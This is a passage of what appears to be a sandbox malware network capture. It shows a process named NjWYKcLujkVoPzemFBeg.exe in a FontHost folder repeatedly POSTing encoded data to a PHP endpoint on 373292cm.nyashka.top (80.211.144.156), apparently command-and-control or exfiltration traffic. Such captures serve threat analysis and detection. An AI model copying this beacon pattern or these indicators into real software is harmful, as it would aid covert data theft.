                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:05.835544109 CEST2504OUT


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.55989880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:06.062045097 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:06.413326025 CEST1828OUT
                              Aug 25, 2024 15:44:06.733351946 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:06.862045050 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.55989980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:06.185082912 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:06.538404942 CEST2504OUT
                              Aug 25, 2024 15:44:06.846963882 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:06.977273941 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.55990080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:07.151920080 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Aug 25, 2024 15:44:07.507173061 CEST2500OUT
                              Aug 25, 2024 15:44:07.856683016 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:07.987875938 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:07 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              45192.168.2.55990180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:08.125281096 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:08.475903988 CEST2504OUT
                              Aug 25, 2024 15:44:08.786588907 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:08.984129906 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              46192.168.2.55990280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:09.128514051 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:09.520967960 CEST2504OUT
                              Aug 25, 2024 15:44:09.964683056 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:10.000144958 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              47192.168.2.55990380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:10.238861084 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:10.585462093 CEST2504OUT
                              Aug 25, 2024 15:44:10.913904905 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:11.114624023 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:10 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              48192.168.2.55990480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:11.246577024 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:11.601012945 CEST2504OUT


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              49192.168.2.55990580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:11.889693022 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:12.275880098 CEST1808OUT
                              Aug 25, 2024 15:44:12.586159945 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:12.719830990 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: [encoded response body]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              50 | 192.168.2.5 | 59906 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:12.482742071 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:12.835577965 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:13.154925108 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:13.281760931 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              51 | 192.168.2.5 | 59907 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:13.421926975 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:13.773085117 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:14.157879114 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:14.357908964 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              52 | 192.168.2.5 | 59908 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:14.538757086 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:14.903034925 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:15.205976009 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:15.335910082 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:14 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              53 | 192.168.2.5 | 59909 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:15.466371059 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:15.819952965 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:16.128299952 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:16.515790939 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[
                              Aug 25, 2024 15:44:16.559216022 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              54 | 192.168.2.5 | 59910 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:16.651532888 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:17.007065058 CEST | 2500 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:17.343898058 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:17.543200016 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:16 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              55 | 192.168.2.5 | 59911 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:17.700139046 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:18.053955078 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:18.364190102 CEST | 25 | IN | HTTP/1.1 100 Continue


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              56 | 192.168.2.5 | 59912 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:17.735656977 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:18.085160017 CEST | 1828 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:18.402592897 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:18.534056902 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: [encoded response body]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              57 | 192.168.2.5 | 59913 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:18.869560957 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:19.225862980 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:19.536700964 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:19.740916967 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:19 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              58 | 192.168.2.5 | 59915 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:19.873061895 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:20.297946930 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:20.552195072 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:20.683842897 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              59 | 192.168.2.5 | 59916 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:20.806673050 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:21.163599014 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:21.473051071 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:21.671323061 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:21 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              60 | 192.168.2.5 | 59917 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:21.800733089 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:22.147754908 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:22.474215031 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:22.603671074 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:21 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              61 | 192.168.2.5 | 59918 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:22.974040985 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:23.319679022 CEST | 2504 | OUT | Data Raw: [encoded request body]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              62 | 192.168.2.5 | 59919 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:23.544640064 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:23.897895098 CEST | 1828 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:24.240524054 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:24.375861883 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: [encoded response body]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              63 | 192.168.2.5 | 59920 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:23.666508913 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:24.022687912 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:24.338665962 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:24.536891937 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              64 | 192.168.2.5 | 59921 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:24.666372061 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:25.023422003 CEST | 2504 | OUT | Data Raw: [encoded request body]
                              Aug 25, 2024 15:44:25.341253042 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:25.472187996 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:24 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              65 | 192.168.2.5 | 59922 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:25.659923077 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:26.007133007 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:26.399384975 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:26.645977974 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              66 | 192.168.2.5 | 59923 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:26.813533068 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:27.163429022 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:27.498223066 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:27.634131908 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              67 | 192.168.2.5 | 59924 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:27.761595011 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
